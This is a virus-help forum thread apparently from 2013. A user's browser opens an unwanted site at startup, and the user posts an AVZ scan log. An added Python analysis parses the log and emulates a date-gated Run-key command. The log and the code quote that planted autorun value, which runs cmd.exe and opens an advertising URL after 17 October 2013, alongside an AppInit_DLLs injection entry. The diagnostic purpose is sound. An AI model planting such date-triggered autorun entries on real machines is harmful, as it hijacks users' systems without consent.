Good day. The problem is as follows:
When Windows starts, the browser launches automatically and opens the site http://stabgames.org/ .
There were difficulties with sending the logs, since AVZ is in English.
AVZ Antiviral Toolkit log; AVZ version is 4.41
Scanning started at 18.11.2013 18:17:17
Database loaded: signatures - 297613, NN profile(s) - 2, malware removal microprograms - 56, signature database released 18.11.2013 16:00
Heuristic microprograms loaded: 405
PVS microprograms loaded: 9
Digital signatures of system files loaded: 611695
Heuristic analyzer mode: Maximum heuristics mode
Malware removal mode: disabled
Windows version is: 6.1.7601, Service Pack 1 ; AVZ is run with administrator rights
System Restore: enabled
1. Searching for Rootkits and other software intercepting API functions
1.1 Searching for user-mode API hooks
Analysis: kernel32.dll, export table found in section .text
Analysis: ntdll.dll, export table found in section .text
Analysis: user32.dll, export table found in section .text
Analysis: advapi32.dll, export table found in section .text
Analysis: ws2_32.dll, export table found in section .text
Analysis: wininet.dll, export table found in section .text
Analysis: rasapi32.dll, export table found in section .text
Analysis: urlmon.dll, export table found in section .text
Analysis: netapi32.dll, export table found in section .text
1.2 Searching for kernel-mode API hooks
Error - file not found (C:\SystemRoot\system32\xNtKrnl.exe)
1.4 Searching for masking processes and drivers
Checking not performed: extended monitoring driver (AVZPM) is not installed
1.5 Checking IRP handlers
Error loading driver - operation interrupted [C000036B]
2. Scanning RAM
Number of processes found: 33
Extended process analysis: 1536 C:\ProgramData\VKSaver\VKSaver.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
[ES]:EXE runtime packer ?
Extended process analysis: 6080 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
[ES]:Program code includes networking-related functionality
[ES]:Registered for automatic startup !!
[ES]:Loads RASAPI DLL - may use dialing ?
Extended process analysis: 4220 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
[ES]:Registered for automatic startup !!
Extended process analysis: 1612 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
[ES]:Registered for automatic startup !!
Extended process analysis: 5988 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
[ES]:Registered for automatic startup !!
Extended process analysis: 4364 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
[ES]:Registered for automatic startup !!
Extended process analysis: 6000 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
[ES]:Registered for automatic startup !!
Number of modules loaded: 477
Scanning RAM - complete
3. Scanning disks
4. Checking Winsock Layered Service Provider (SPI/LSP)
LSP settings checked. No errors detected
5. Searching for keyboard/mouse/windows events hooks (Keyloggers, Trojan DLLs)
Checking - disabled by user
6. Searching for opened TCP/UDP ports used by malicious software
Checking - disabled by user
7. Heuristic system check
Latent DLL loading through AppInit_DLLs suspected: "C:\PROGRA~3\VKSaver\vksaver3.dll"
Found a call command line interpreter in startup [DR=1] HKLM\Software\Microsoft\Windows\CurrentVersion\Run \Babakan = [cmd.exe /k if %date:~6,4%%date:~3,2%%date:~0,2% LEQ 20131017 (exit) else (start http://dinoklafbzor.org && exit)]
Checking - complete
8. Searching for vulnerabilities
>> Services: potentially dangerous service allowed: TermService (Remote Desktop Services)
>> Services: potentially dangerous service allowed: SSDPSRV (SSDP Discovery)
>> Services: potentially dangerous service allowed: Schedule (Task Scheduler)
> Services: please bear in mind that the set of services depends on the use of the PC (home PC, office PC connected to corporate network, etc)!
>> Security: disk drives' autorun is enabled
>> Security: administrative shares (C$, D$ ...) are enabled
>> Security: anonymous user access is enabled
>> Security: sending Remote Assistant queries is enabled
Checking - complete
9. Troubleshooting wizard
>> HDD autorun is allowed
>> Network drives autorun is allowed
>> Removable media autorun is allowed
Checking - complete
Files scanned: 514, extracted from archives: 3, malicious software found 0, suspicions - 0
Scanning finished at 18.11.2013 18:17:43
Time of scanning: 00:00:26
If you have a suspicion on presence of viruses or questions on the suspected objects,
you can address http://forum.kaspersky.com/index.php?showforum=19
For automatic scanning of files from the AVZ quarantine you can use the service http://virusdetector.ru/
System Analysis in progress
System Analysis - complete
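The interesting part of the log is section 7: an HKLM Run value named Babakan runs cmd.exe, builds a YYYYMMDD string out of %date%, and opens a URL whenever that string is greater than 20131017, which is why the browser only started popping up on boot after mid-October 2013 (the scan itself is dated 18.11.2013). The page does not say why the URL in the Run value differs from the one the poster sees in the browser. As an added example, not part of the original post or of AVZ, the Python below parses those two heuristic lines (embedded verbatim as constructed sample input), pulls out the AppInit_DLLs path and the Run-key command, and emulates the cmd.exe date gate so you can see which branch runs on a given day. It assumes the Russian-locale %date% layout DD.MM.YYYY (the log shows Russian service names); on other locales the substring trick yields a different token and the comparison is meaningless.

```python
import re
from datetime import date

# Constructed sample input: the two "Heuristic system check" lines copied
# verbatim from the AVZ log above.
AVZ_LINES = [
    r'Latent DLL loading through AppInit_DLLs suspected: "C:\PROGRA~3\VKSaver\vksaver3.dll"',
    r'Found a call command line interpreter in startup [DR=1] HKLM\Software\Microsoft\Windows\CurrentVersion\Run \Babakan = [cmd.exe /k if %date:~6,4%%date:~3,2%%date:~0,2% LEQ 20131017 (exit) else (start http://dinoklafbzor.org && exit)]',
]

APPINIT_RE = re.compile(r'AppInit_DLLs suspected: "(?P<dll>[^"]+)"')
RUN_RE = re.compile(r'startup \[DR=\d+\] (?P<key>HK\S+) \\(?P<name>[^=]+?) = \[(?P<cmd>.*)\]$')
URL_RE = re.compile(r'https?://[^\s&)]+')
# cmd.exe's "if <lhs> <op> <rhs> (<then>) else (<else>)" with a numeric comparison operator
IF_RE = re.compile(r'\bif (?P<lhs>\S+) (?P<op>EQU|NEQ|LSS|LEQ|GTR|GEQ) (?P<rhs>\d+) '
                   r'\((?P<then>[^)]*)\) else \((?P<els>.*)\)$')
DATE_TOKEN = '%date:~6,4%%date:~3,2%%date:~0,2%'


def parse_avz_heuristics(lines):
    """Return structured findings for the AppInit_DLLs and Run-key lines of an AVZ log."""
    findings = []
    for line in lines:
        m = APPINIT_RE.search(line)
        if m:
            findings.append({'type': 'appinit_dll', 'path': m.group('dll')})
            continue
        m = RUN_RE.search(line)
        if m:
            cmd = m.group('cmd')
            findings.append({
                'type': 'run_key',
                'key': m.group('key'),
                'name': m.group('name').strip(),
                'cmd': cmd,
                'urls': URL_RE.findall(cmd),
                # an autorun entry that goes through cmd.exe and launches a URL is the red flag
                'suspicious': cmd.lower().startswith('cmd.exe') and bool(URL_RE.search(cmd)),
            })
    return findings


def cmd_date_token(d):
    """Emulate %date:~6,4%%date:~3,2%%date:~0,2% for a %date% laid out as DD.MM.YYYY.
    Assumption: Russian-locale Windows; other locales lay %date% out differently."""
    s = d.strftime('%d.%m.%Y')
    return s[6:10] + s[3:5] + s[0:2]


_OPS = {'EQU': lambda a, b: a == b, 'NEQ': lambda a, b: a != b,
        'LSS': lambda a, b: a < b, 'LEQ': lambda a, b: a <= b,
        'GTR': lambda a, b: a > b, 'GEQ': lambda a, b: a >= b}


def urls_opened_on(cmd, today):
    """Evaluate the date-gated if/else in a Run-key command for the given day
    (a date or an ISO 'YYYY-MM-DD' string) and return the URLs the chosen branch starts."""
    if isinstance(today, str):
        today = date.fromisoformat(today)
    m = IF_RE.search(cmd)
    if not m:
        return URL_RE.findall(cmd)  # no gate: whatever URL is there opens on every boot
    if m.group('lhs') != DATE_TOKEN:
        raise ValueError('unsupported left-hand side: ' + m.group('lhs'))
    holds = _OPS[m.group('op')](int(cmd_date_token(today)), int(m.group('rhs')))
    branch = m.group('then') if holds else m.group('els')
    return URL_RE.findall(branch)


if __name__ == '__main__':
    for f in parse_avz_heuristics(AVZ_LINES):
        print(f)
        if f['type'] == 'run_key':
            for day in ('2013-10-17', '2013-11-18'):
                print(day, '->', urls_opened_on(f['cmd'], day) or 'exits silently')
```

The two findings are the things to clean up: the Babakan value under HKLM\...\Run and the AppInit_DLLs entry pointing at vksaver3.dll (AppInit_DLLs is a legacy mechanism that injects a DLL into every process that loads user32.dll, which is why AVZ flags it even for a known program). Run the gate emulation for the scan date and you get the URL; run it for 17.10.2013 or earlier and you get nothing, which matches a Run entry that was planted ahead of time and only became visible later.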
Dear ZLOiPK, thank you for contacting our forum!
Help with computer infections at VirusInfo.Info is provided completely free of charge. The helpers will answer your request as soon as possible. To receive help you need to provide scan logs from the AVZ and HijackThis utilities; see the rules for submitting a help request for details.
If our site turns out to be useful to you and you have the opportunity, please support the project.